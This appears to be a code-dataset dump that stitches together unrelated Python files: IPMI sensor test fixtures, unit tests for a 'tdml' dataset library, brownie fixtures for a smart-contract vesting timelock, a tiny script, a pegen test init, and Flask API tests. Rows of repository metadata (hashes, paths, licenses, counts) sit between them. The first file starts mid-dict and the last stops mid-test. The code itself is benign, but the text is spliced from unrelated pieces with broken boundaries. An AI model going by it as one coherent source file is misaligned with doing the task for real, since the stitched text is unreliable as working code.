'Settable Thresholds': 'lcr ucr',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '12.042'
},
'Planar 3.3V (0x16)': {
'Status': 'ok',
'Sensor Reading': '3.309 (+/- 0) Volts',
'Entity ID': '7.1 (System Board)',
'Assertions Enabled': 'lcr- ucr+',
'Event Message Control': 'Per-threshold',
'Assertion Events': '',
'Maximum sensor range': 'Unspecified',
'Positive Hysteresis': '0.028',
'Deassertions Enabled': 'lcr- ucr+',
'Sensor Type (Analog)': 'Voltage',
'Lower critical': '3.039',
'Negative Hysteresis': '0.028',
'Threshold Read Mask': 'lcr ucr',
'Upper critical': '3.564',
'Readable Thresholds': 'lcr ucr',
'Sensor ID': 'Planar 3.3V (0x16)',
'Settable Thresholds': 'lcr ucr',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '3.309'
},
'Planar VBAT (0x1c)': {
'Status': 'ok',
'Sensor Reading': '3.137 (+/- 0) Volts',
'Entity ID': '7.1 (System Board)',
'Assertions Enabled': 'lnc- lcr-',
'Event Message Control': 'Per-threshold',
'Assertion Events': '',
'Readable Thresholds': 'lcr lnc',
'Positive Hysteresis': '0.025',
'Deassertions Enabled': 'lnc- lcr-',
'Sensor Type (Analog)': 'Voltage',
'Lower critical': '2.095',
'Negative Hysteresis': '0.025',
'Lower non-critical': '2.248',
'Maximum sensor range': 'Unspecified',
'Sensor ID': 'Planar VBAT (0x1c)',
'Settable Thresholds': 'lcr lnc',
'Threshold Read Mask': 'lcr lnc',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '3.010'
},
'Planar 5V (0x17)': {
'Status': 'ok',
'Sensor Reading': '5.062 (+/- 0) Volts',
'Entity ID': '7.1 (System Board)',
'Assertions Enabled': 'lcr- ucr+',
'Event Message Control': 'Per-threshold',
'Assertion Events': '',
'Maximum sensor range': 'Unspecified',
'Positive Hysteresis': '0.045',
'Deassertions Enabled': 'lcr- ucr+',
'Sensor Type (Analog)': 'Voltage',
'Lower critical': '4.475',
'Negative Hysteresis': '0.045',
'Threshold Read Mask': 'lcr ucr',
'Upper critical': '5.582',
'Readable Thresholds': 'lcr ucr',
'Sensor ID': 'Planar 5V (0x17)',
'Settable Thresholds': 'lcr ucr',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '4.995'
}
}
SENSOR_DATA = {
'message_id': 'f22188ca-c068-47ce-a3e5-0e27ffe234c6',
'publisher_id': 'f23188ca-c068-47ce-a3e5-0e27ffe234c6',
'payload': {
'instance_uuid': 'f11251ax-c568-25ca-4582-0x27add644c6',
'timestamp': '20140223134852',
'node_uuid': 'f4982fd2-2f2b-4bb5-9aff-48aac801d1ad',
'event_type': 'hardware.ipmi.metrics.update',
'payload': {
'Temperature': TEMPERATURE_DATA,
'Current': CURRENT_DATA,
'Fan': FAN_DATA,
'Voltage': VOLTAGE_DATA
}
}
}
EMPTY_PAYLOAD = {
'message_id': 'f22188ca-c068-47ce-a3e5-0e27ffe234c6',
'publisher_id': 'f23188ca-c068-47ce-a3e5-0e27ffe234c6',
'payload': {
'instance_uuid': 'f11251ax-c568-25ca-4582-0x27add644c6',
'timestamp': '20140223134852',
'node_uuid': 'f4982fd2-2f2b-4bb5-9aff-48aac801d1ad',
'event_type': 'hardware.ipmi.metrics.update',
'payload': {
}
}
}
MISSING_SENSOR = {
'message_id': 'f22188ca-c068-47ce-a3e5-0e27ffe234c6',
'publisher_id': 'f23188ca-c068-47ce-a3e5-0e27ffe234c6',
'payload': {
'instance_uuid': 'f11251ax-c568-25ca-4582-0x27add644c6',
'timestamp': '20140223134852',
'node_uuid': 'f4982fd2-2f2b-4bb5-9aff-48aac801d1ad',
'event_type': 'hardware.ipmi.metrics.update',
'payload': {
'Temperature': {
'PCI Riser 1 Temp (0x33)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Entity ID': '16.1 (System Internal Expansion Board)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '70.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '85.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '80.000',
'Sensor ID': 'PCI Riser 1 Temp (0x33)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
}
}
}
}
BAD_SENSOR = {
'message_id': 'f22188ca-c068-47ce-a3e5-0e27ffe234c6',
'publisher_id': 'f23188ca-c068-47ce-a3e5-0e27ffe234c6',
'payload': {
'instance_uuid': 'f11251ax-c568-25ca-4582-0x27add644c6',
'timestamp': '20140223134852',
'node_uuid': 'f4982fd2-2f2b-4bb5-9aff-48aac801d1ad',
'event_type': 'hardware.ipmi.metrics.update',
'payload': {
'Temperature': {
'PCI Riser 1 Temp (0x33)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': 'some bad stuff',
'Entity ID': '16.1 (System Internal Expansion Board)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '70.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '85.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '80.000',
'Sensor ID': 'PCI Riser 1 Temp (0x33)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
}
}
}
}
NO_SENSOR_ID = {
'message_id': 'f22188ca-c068-47ce-a3e5-0e27ffe234c6',
'publisher_id': 'f23188ca-c068-47ce-a3e5-0e27ffe234c6',
'payload': {
'instance_uuid': 'f11251ax-c568-25ca-4582-0x27add644c6',
'timestamp': '20140223134852',
'node_uuid': 'f4982fd2-2f2b-4bb5-9aff-48aac801d1ad',
'event_type': 'hardware.ipmi.metrics.update',
'payload': {
'Temperature': {
'PCI Riser 1 Temp (0x33)': {
'Sensor Reading': '26 C',
},
}
}
}
}
NO_NODE_ID = {
'message_id': 'f22188ca-c068-47ce-a3e5-0e27ffe234c6',
'publisher_id': 'f23188ca-c068-47ce-a3e5-0e27ffe234c6',
'payload': {
'instance_uuid': 'f11251ax-c568-25ca-4582-0x27add644c6',
'timestamp': '20140223134852',
'event_type': 'hardware.ipmi.metrics.update',
'payload': {
'Temperature': {
'PCI Riser 1 Temp (0x33)': {
'Sensor Reading': '26 C',
'Sensor ID': 'PCI Riser 1 Temp (0x33)',
},
}
}
}
}
| 37.915829
| 75
| 0.535039
| 3,003
| 30,181
| 5.361971
| 0.105228
| 0.040989
| 0.080611
| 0.040989
| 0.864924
| 0.847038
| 0.8353
| 0.803565
| 0.803565
| 0.782015
| 0
| 0.09209
| 0.298764
| 30,181
| 795
| 76
| 37.963522
| 0.66873
| 0.024519
| 0
| 0.740397
| 0
| 0
| 0.59359
| 0.033853
| 0
| 0
| 0.011013
| 0
| 0.113907
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58554d977eacfb2b3fad7a85a068d00f0bbd8221
| 8,100
|
py
|
Python
|
tests/test_dataset/test_dataset_numpy.py
|
zechengz/tdml
|
af60d35b7b62259e414edaa0a45fb2d3563b0430
|
[
"MIT"
] | 2
|
2020-08-08T00:36:23.000Z
|
2021-06-21T19:51:30.000Z
|
tests/test_dataset/test_dataset_numpy.py
|
zechengz/tdml
|
af60d35b7b62259e414edaa0a45fb2d3563b0430
|
[
"MIT"
] | null | null | null |
tests/test_dataset/test_dataset_numpy.py
|
zechengz/tdml
|
af60d35b7b62259e414edaa0a45fb2d3563b0430
|
[
"MIT"
] | 1
|
2020-10-06T19:40:41.000Z
|
2020-10-06T19:40:41.000Z
|
import os
import numpy as np
import tdml
import unittest
from utils import *
class TestDatasetNumPy(unittest.TestCase):
def test_no_label(self):
df = generate_simple_pd_dataframe()
# no label, only feature
ds = tdml.Dataset(df)
ds.transform()
self.assertEqual(ds.feature.shape, (10, 5))
self.assertEqual(ds.num_sample, 10)
self.assertEqual(ds.num_feature, 5)
self.assertEqual(ds.num_label, 0)
def test_label(self):
df = generate_simple_pd_dataframe()
# categorical label
ds = tdml.Dataset(df, label='Evaluation')
ds.transform()
self.assertEqual(ds.feature.shape, (10, 4))
self.assertEqual(ds.num_sample, 10)
self.assertEqual(ds.num_feature, 4)
self.assertEqual(ds.num_label, 3)
# boolean label
ds = tdml.Dataset(df, label='Dark')
ds.transform()
self.assertEqual(ds.feature.shape, (10, 4))
self.assertEqual(ds.num_sample, 10)
self.assertEqual(ds.num_feature, 4)
self.assertEqual(ds.num_label, 2)
def test_specified_feature(self):
df = generate_simple_pd_dataframe()
# one feature
ds = tdml.Dataset(df, feature='Brand')
ds.transform()
self.assertEqual(ds.feature.shape, (10, 1))
self.assertEqual(ds.num_sample, 10)
self.assertEqual(ds.label, None)
self.assertEqual(ds.num_feature, 1)
self.assertEqual(ds.num_label, 0)
# two features
ds = tdml.Dataset(df, feature=['Brand', 'Price'])
ds.transform()
self.assertEqual(ds.feature.shape, (10, 2))
self.assertEqual(ds.num_sample, 10)
self.assertEqual(ds.label, None)
self.assertEqual(ds.num_feature, 2)
self.assertEqual(ds.num_label, 0)
def test_to_string_before_split(self):
df = generate_simple_pd_dataframe()
# no label, only feature
ds = tdml.Dataset(df)
ds.transform()
to_string = 'Dataset(feature=[10, 5], feature_mapping=2)'
self.assertEqual(to_string, str(ds))
# categorical label
ds = tdml.Dataset(df, label='Evaluation')
ds.transform()
to_string = 'Dataset(label=[10], feature=[10, 4], label_mapping=3, feature_mapping=1)'
self.assertEqual(to_string, str(ds))
# boolean label
ds = tdml.Dataset(df, label='Dark')
ds.transform()
to_string = 'Dataset(label=[10], feature=[10, 4], feature_mapping=2)'
self.assertEqual(to_string, str(ds))
def test_split_two_label(self):
df = pd.read_csv('data/GOOG.csv')
df = df.drop(columns=['Date', 'Adj Close'])
ds = tdml.Dataset(df, label='Close')
ds.transform()
ds.train_test_split(seed=0)
to_string = 'Dataset(label=[252], feature=[252, 4], train_x=[201, 4], train_y=[201], test_x=[51, 4], test_y=[51])'
self.assertEqual(to_string, str(ds))
self.assertEqual(ds.train_x.shape, (201, 4))
self.assertEqual(ds.test_x.shape, (51, 4))
self.assertEqual(ds.val_x, None)
self.assertEqual(ds.train_y.shape, (201, ))
self.assertEqual(ds.test_y.shape, (51, ))
self.assertEqual(ds.val_y, None)
def test_split_two_no_label(self):
df = pd.read_csv('data/GOOG.csv')
df = df.drop(columns=['Date', 'Adj Close'])
ds = tdml.Dataset(df, feature=['Open', 'High'])
ds.transform()
ds.train_test_split(seed=0)
to_string = 'Dataset(feature=[252, 2], train_x=[201, 2], test_x=[51, 2])'
self.assertEqual(to_string, str(ds))
self.assertEqual(ds.train_x.shape, (201, 2))
self.assertEqual(ds.test_x.shape, (51, 2))
self.assertEqual(ds.val_x, None)
self.assertEqual(ds.train_y, None)
self.assertEqual(ds.test_y, None)
self.assertEqual(ds.val_y, None)
def test_split_three_label(self):
df = pd.read_csv('data/GOOG.csv')
df = df.drop(columns=['Date', 'Adj Close'])
ds = tdml.Dataset(df, label='Close')
ds.transform()
ds.train_val_test_split(seed=0)
to_string = 'Dataset(label=[252], feature=[252, 4], train_x=[201, 4], train_y=[201], test_x=[26, 4], test_y=[26], val_x=[25, 4], val_y=[25])'
self.assertEqual(to_string, str(ds))
self.assertEqual(ds.train_x.shape, (201, 4))
self.assertEqual(ds.test_x.shape, (26, 4))
self.assertEqual(ds.val_x.shape, (25, 4))
self.assertEqual(ds.train_y.shape, (201, ))
self.assertEqual(ds.test_y.shape, (26, ))
self.assertEqual(ds.val_y.shape, (25, ))
def test_split_three_no_label(self):
df = pd.read_csv('data/GOOG.csv')
df = df.drop(columns=['Date', 'Adj Close'])
ds = tdml.Dataset(df)
ds.transform()
ds.train_val_test_split()
to_string = 'Dataset(feature=[252, 5], train_x=[201, 5], test_x=[26, 5], val_x=[25, 5])'
self.assertEqual(to_string, str(ds))
self.assertEqual(ds.train_x.shape, (201, 5))
self.assertEqual(ds.test_x.shape, (26, 5))
self.assertEqual(ds.val_x.shape, (25, 5))
self.assertEqual(ds.train_y, None)
self.assertEqual(ds.test_y, None)
self.assertEqual(ds.val_y, None)
def test_label_mapping(self):
df = pd.read_csv('data/GOOG.csv')
df = df.drop(columns=['Date', 'Adj Close'])
ds = tdml.Dataset(df, label='Close')
ds.transform()
self.assertEqual(ds.label_mapping, None)
df = generate_simple_pd_dataframe()
ds = tdml.Dataset(df, label='Evaluation')
ds.transform()
self.assertEqual(len(ds.label_mapping), 3)
self.assertEqual(len(ds.feature_mapping), 1)
ds = tdml.Dataset(df)
ds.transform()
self.assertEqual(ds.label_mapping, None)
self.assertEqual(len(ds.feature_mapping), 2)
def test_prespecified_split_two(self):
df = generate_simple_pd_dataframe()
ds = tdml.Dataset(df, label="Evaluation")
ds.transform()
indices = np.arange(10)
train_split = indices[:7]
test_split = indices[7:]
ds.train_test_split(train_split=train_split, test_split=test_split)
self.assertEqual(ds.train_x.shape, (7, 4))
self.assertEqual(ds.test_x.shape, (3, 4))
self.assertEqual(ds.train_y.shape, (7, ))
self.assertEqual(ds.test_y.shape, (3, ))
ds = tdml.Dataset(df)
ds.transform()
ds.train_test_split(train_split=train_split, test_split=test_split)
self.assertEqual(ds.train_x.shape, (7, 5))
self.assertEqual(ds.test_x.shape, (3, 5))
self.assertEqual(ds.train_y, None)
self.assertEqual(ds.test_y, None)
def test_prespecified_split_three(self):
df = generate_simple_pd_dataframe()
ds = tdml.Dataset(df, label="Evaluation")
ds.transform()
indices = np.arange(10)
train_split = indices[:6]
val_split = indices[6:8]
test_split = indices[8:]
ds.train_val_test_split(train_split=train_split, val_split=val_split, test_split=test_split)
self.assertEqual(ds.train_x.shape, (6, 4))
self.assertEqual(ds.val_x.shape, (2, 4))
self.assertEqual(ds.test_x.shape, (2, 4))
self.assertEqual(ds.train_y.shape, (6, ))
self.assertEqual(ds.val_y.shape, (2, ))
self.assertEqual(ds.test_y.shape, (2, ))
ds = tdml.Dataset(df)
ds.transform()
ds.train_val_test_split(train_split=train_split, val_split=val_split, test_split=test_split)
self.assertEqual(ds.train_x.shape, (6, 5))
self.assertEqual(ds.val_x.shape, (2, 5))
self.assertEqual(ds.test_x.shape, (2, 5))
self.assertEqual(ds.train_y, None)
self.assertEqual(ds.val_y, None)
self.assertEqual(ds.test_y, None)
def test_reshuffle(self):
df = generate_simple_pd_dataframe()
ds = tdml.Dataset(df, label="Evaluation")
ds.transform()
indices = np.arange(10)
train_split = indices[:6]
val_split = indices[6:8]
test_split = indices[8:]
ds.train_val_test_split(train_split=train_split, val_split=val_split, test_split=test_split)
ds.reshuffle(seed=1)
self.assertTrue(not np.array_equal(ds._reshuffle_indices, train_split))
self.assertEqual(len(ds._reshuffle_indices), len(train_split))
def test_text(self):
# Default transformation
df = pd.read_csv('data/simple_text.csv')
ds = tdml.Dataset(df, label='Broken', text="Description")
ds.transform()
self.assertTrue('Description' in ds.feature_mapping)
self.assertEqual(ds.idx_to_feature((4, 20)), 'Description')
self.assertEqual(ds.feature_to_idx('Description'), (4, 20))
# Customized transformation
ds = tdml.Dataset(df, text="Description")
ds.transform(text_transform=simple_embedding, val=-1, dim=8)
self.assertTrue('Description' in ds.feature_mapping)
self.assertEqual(ds.idx_to_feature((5, 13)), 'Description')
self.assertEqual(ds.feature_to_idx('Description'), (5, 13))
if __name__ == '__main__':
unittest.main()
| 32.66129
| 143
| 0.712346
| 1,272
| 8,100
| 4.343553
| 0.081761
| 0.225339
| 0.221538
| 0.059729
| 0.856833
| 0.837466
| 0.780633
| 0.708778
| 0.646516
| 0.612489
| 0
| 0.032203
| 0.125926
| 8,100
| 248
| 144
| 32.66129
| 0.748164
| 0.022593
| 0
| 0.580808
| 1
| 0.015152
| 0.112306
| 0.005312
| 0
| 0
| 0
| 0
| 0.434343
| 1
| 0.065657
| false
| 0
| 0.025253
| 0
| 0.09596
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5471446bd7dab70562ac3af071c70f3245a7e8a2
| 4,041
|
py
|
Python
|
tests/smart_timelock/fixtures.py
|
EchoDao-BSC/badger-system
|
d9276c5ce2053f0f5f1eb832f6f13204d1be9489
|
[
"MIT"
] | 99
|
2020-12-02T08:40:48.000Z
|
2022-03-15T05:21:06.000Z
|
tests/smart_timelock/fixtures.py
|
EchoDao-BSC/badger-system
|
d9276c5ce2053f0f5f1eb832f6f13204d1be9489
|
[
"MIT"
] | 115
|
2020-12-15T07:15:39.000Z
|
2022-03-28T22:21:03.000Z
|
tests/smart_timelock/fixtures.py
|
EchoDao-BSC/badger-system
|
d9276c5ce2053f0f5f1eb832f6f13204d1be9489
|
[
"MIT"
] | 56
|
2020-12-11T06:50:04.000Z
|
2022-02-21T09:17:38.000Z
|
import pytest
from brownie import *
from dotmap import DotMap
@pytest.fixture(scope="module")
def timelock_unit():
unlockTime = chain.time() + 1000000
deployer = accounts[0]
team = [accounts[1], accounts[2], accounts[3]]
governor = accounts[5]
minnow = accounts[4]
tokenGifterAmount = Wei("500 ether")
tokenRequestAmount = Wei("100 ether")
transferAmount = Wei("500000 ether")
tokenGifter = TokenGifter.deploy({"from": deployer})
ethGifter = EthGifter.deploy({"from": deployer})
gToken = MockToken.deploy({"from": deployer})
gToken.initialize(
[
web3.toChecksumAddress(tokenGifter.address),
web3.toChecksumAddress(deployer.address),
],
[tokenGifterAmount * 2, transferAmount * 10],
{"from": deployer},
)
smartVesting = SmartVesting.deploy({"from": deployer})
smartVesting.initialize(gToken, team[0], governor, unlockTime, {"from": deployer})
gToken.transfer(smartVesting, transferAmount)
stakingMock = StakingMock.deploy({"from": deployer})
stakingMock.initialize(gToken, {"from": deployer})
deployer.transfer(ethGifter, Wei("10 ether"))
miscToken = MockToken.deploy({"from": deployer})
miscToken.initialize(
[
web3.toChecksumAddress(tokenGifter.address),
web3.toChecksumAddress(smartVesting.address),
],
[tokenGifterAmount * 2, tokenGifterAmount],
{"from": deployer},
)
yield DotMap(
tokenGifter=tokenGifter,
ethGifter=ethGifter,
smartVesting=smartVesting,
stakingMock=stakingMock,
miscToken=miscToken,
deployer=deployer,
team=team,
governor=governor,
minnow=minnow,
params={
"tokenGifterAmount": tokenGifterAmount,
"tokenRequestAmount": tokenRequestAmount,
"transferAmount": transferAmount,
"unlockTime": unlockTime,
},
)
@pytest.fixture(scope="module")
def vesting_unit():
start = chain.time + 1000
cliffDuration = days(30)
duration = days(335)
deployer = accounts[0]
team = [accounts[1], accounts[2], accounts[3]]
governor = accounts[5]
minnow = accounts[4]
tokenGifterAmount = Wei("500 ether")
tokenRequestAmount = Wei("100 ether")
transferAmount = Wei("500000 ether")
tokenGifter = TokenGifter.deploy({"from": deployer})
ethGifter = EthGifter.deploy({"from": deployer})
gToken = MockToken.deploy({"from": deployer})
gToken.initialize(
[
web3.toChecksumAddress(tokenGifter.address),
web3.toChecksumAddress(deployer.address),
],
[tokenGifterAmount * 2, transferAmount * 10],
{"from": deployer},
)
smartVesting = SmartVesting.deploy({"from": deployer})
smartVesting.initialize(
gToken, team[0], governor, start, cliffDuration, duration, {"from": deployer}
)
gToken.transfer(smartVesting, transferAmount)
stakingMock = StakingMock.deploy({"from": deployer})
stakingMock.initialize(gToken, {"from": deployer})
deployer.transfer(ethGifter, Wei("10 ether"))
miscToken = MockToken.deploy({"from": deployer})
miscToken.initialize(
[
web3.toChecksumAddress(tokenGifter.address),
web3.toChecksumAddress(smartVesting.address),
],
[tokenGifterAmount * 2, tokenGifterAmount],
{"from": deployer},
)
yield DotMap(
tokenGifter=tokenGifter,
ethGifter=ethGifter,
smartVesting=smartVesting,
stakingMock=stakingMock,
miscToken=miscToken,
deployer=deployer,
team=team,
governor=governor,
minnow=minnow,
params={
"tokenGifterAmount": tokenGifterAmount,
"tokenRequestAmount": tokenRequestAmount,
"transferAmount": transferAmount,
"start": start,
"cliffDuration": cliffDuration,
"duration": duration,
},
)
| 29.282609
| 86
| 0.628557
| 327
| 4,041
| 7.761468
| 0.17737
| 0.094563
| 0.085106
| 0.037825
| 0.897557
| 0.876281
| 0.876281
| 0.876281
| 0.876281
| 0.876281
| 0
| 0.024479
| 0.251918
| 4,041
| 137
| 87
| 29.49635
| 0.815084
| 0
| 0
| 0.747826
| 0
| 0
| 0.074734
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017391
| false
| 0
| 0.026087
| 0
| 0.043478
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
547595b76b3f4373c58cc6d38ec6a2f7d54fcaa3
| 91
|
py
|
Python
|
diy_programs/diy_7_fns_p4.py
|
bhalajin/blueprints
|
7ad1d7860aafbb4c333de9efbbb7e546ed43c569
|
[
"MIT"
] | null | null | null |
diy_programs/diy_7_fns_p4.py
|
bhalajin/blueprints
|
7ad1d7860aafbb4c333de9efbbb7e546ed43c569
|
[
"MIT"
] | null | null | null |
diy_programs/diy_7_fns_p4.py
|
bhalajin/blueprints
|
7ad1d7860aafbb4c333de9efbbb7e546ed43c569
|
[
"MIT"
] | null | null | null |
def doubleparams(param):
return param*2
print(doubleparams(10))
print(doubleparams('10'))
| 18.2
| 25
| 0.769231
| 12
| 91
| 5.833333
| 0.583333
| 0.485714
| 0.542857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059524
| 0.076923
| 91
| 5
| 25
| 18.2
| 0.77381
| 0
| 0
| 0
| 0
| 0
| 0.021739
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
|
0
| 7
|
5488eb5b63bca495647d82d848e5c7f62e0fc95d
| 32
|
py
|
Python
|
MyPackage/pkg2/hello.py
|
hisplan/py-packaging-template
|
1ffc8c4f834959b781039cbecc8fc6d79f5ba9fe
|
[
"MIT"
] | null | null | null |
MyPackage/pkg2/hello.py
|
hisplan/py-packaging-template
|
1ffc8c4f834959b781039cbecc8fc6d79f5ba9fe
|
[
"MIT"
] | null | null | null |
MyPackage/pkg2/hello.py
|
hisplan/py-packaging-template
|
1ffc8c4f834959b781039cbecc8fc6d79f5ba9fe
|
[
"MIT"
] | null | null | null |
def bar():
return "Hello, bar!"
| 16
| 21
| 0.625
| 5
| 32
| 4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15625
| 32
| 2
| 21
| 16
| 0.740741
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
549362aad173dd59ea22b0212ba1b5ebee267ec1
| 171
|
py
|
Python
|
tests/__init__.py
|
ahupp/pegen
|
e28fe4fb1972c55af5ddb6a7bdd9cba4ea072b81
|
[
"MIT"
] | 106
|
2020-05-14T03:43:47.000Z
|
2022-03-26T21:46:47.000Z
|
tests/__init__.py
|
ahupp/pegen
|
e28fe4fb1972c55af5ddb6a7bdd9cba4ea072b81
|
[
"MIT"
] | 60
|
2020-05-07T23:17:46.000Z
|
2022-03-30T20:26:25.000Z
|
tests/__init__.py
|
ahupp/pegen
|
e28fe4fb1972c55af5ddb6a7bdd9cba4ea072b81
|
[
"MIT"
] | 20
|
2020-05-22T10:21:30.000Z
|
2022-03-26T21:23:44.000Z
|
import os
from test.support import load_package_tests
# Load all tests in package
def load_tests(*args):
return load_package_tests(os.path.dirname(__file__), *args)
| 21.375
| 63
| 0.783626
| 27
| 171
| 4.62963
| 0.592593
| 0.176
| 0.256
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134503
| 171
| 7
| 64
| 24.428571
| 0.844595
| 0.146199
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
54bc46427faf302634295a70bd1bcdba4dcecf6e
| 18,545
|
py
|
Python
|
tests/test_api.py
|
derwolfe/api-pycon2014
|
ec7efda1fda87244cdf4d8a2b0f48927c2edb835
|
[
"MIT"
] | 1
|
2019-01-21T04:58:27.000Z
|
2019-01-21T04:58:27.000Z
|
tests/test_api.py
|
derwolfe/api-pycon2014
|
ec7efda1fda87244cdf4d8a2b0f48927c2edb835
|
[
"MIT"
] | null | null | null |
tests/test_api.py
|
derwolfe/api-pycon2014
|
ec7efda1fda87244cdf4d8a2b0f48927c2edb835
|
[
"MIT"
] | null | null | null |
import unittest
from werkzeug.exceptions import BadRequest
from .test_client import TestClient
from api.app import create_app
from api.models import db, User
from api.errors import ValidationError
class TestAPI(unittest.TestCase):
default_username = 'dave'
default_password = 'cat'
def setUp(self):
self.app = create_app('test_config')
self.ctx = self.app.app_context()
self.ctx.push()
db.drop_all()
db.create_all()
u = User(username=self.default_username,
password=self.default_password)
db.session.add(u)
db.session.commit()
self.client = TestClient(self.app, u.generate_auth_token(), '')
def tearDown(self):
db.session.remove()
db.drop_all()
self.ctx.pop()
def test_password_auth(self):
self.app.config['USE_TOKEN_AUTH'] = False
good_client = TestClient(self.app, self.default_username,
self.default_password)
rv, json = good_client.get('/api/v1.0/students/')
self.assertTrue(rv.status_code == 200)
self.app.config['USE_TOKEN_AUTH'] = True
u = User.query.get(1)
good_client = TestClient(self.app, u.generate_auth_token(), '')
rv, json = good_client.get('/api/v1.0/students/')
self.assertTrue(rv.status_code == 200)
def test_bad_auth(self):
bad_client = TestClient(self.app, 'abc', 'def')
rv, json = bad_client.get('/api/v1.0/students/')
self.assertTrue(rv.status_code == 401)
self.app.config['USE_TOKEN_AUTH'] = True
bad_client = TestClient(self.app, 'bad_token', '')
rv, json = bad_client.get('/api/v1.0/students/')
self.assertTrue(rv.status_code == 401)
def test_students(self):
# get collection
rv, json = self.client.get('/api/v1.0/students/')
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['urls'] == [])
# create new
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'susan'})
self.assertTrue(rv.status_code == 201)
susan_url = rv.headers['Location']
# get
rv, json = self.client.get(susan_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['name'] == 'susan')
self.assertTrue(json['url'] == susan_url)
# create new
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'david'})
self.assertTrue(rv.status_code == 201)
david_url = rv.headers['Location']
# get
rv, json = self.client.get(david_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['name'] == 'david')
self.assertTrue(json['url'] == david_url)
# create bad
self.assertRaises(BadRequest, lambda:
self.client.post('/api/v1.0/students/', data={}))
self.assertRaises(ValidationError, lambda:
self.client.post('/api/v1.0/students/',
data={'not-name': 'david'}))
# modify
rv, json = self.client.put(david_url, data={'name': 'david2'})
self.assertTrue(rv.status_code == 200)
# get
rv, json = self.client.get(david_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['name'] == 'david2')
# get collection
rv, json = self.client.get('/api/v1.0/students/')
self.assertTrue(rv.status_code == 200)
self.assertTrue(susan_url in json['urls'])
self.assertTrue(david_url in json['urls'])
self.assertTrue(len(json['urls']) == 2)
# delete
rv, json = self.client.delete(susan_url)
self.assertTrue(rv.status_code == 200)
# get collection
rv, json = self.client.get('/api/v1.0/students/')
self.assertTrue(rv.status_code == 200)
self.assertFalse(susan_url in json['urls'])
self.assertTrue(david_url in json['urls'])
self.assertTrue(len(json['urls']) == 1)
def test_classes(self):
# get collection
rv, json = self.client.get('/api/v1.0/classes/')
self.assertTrue(rv.status_code == 200)
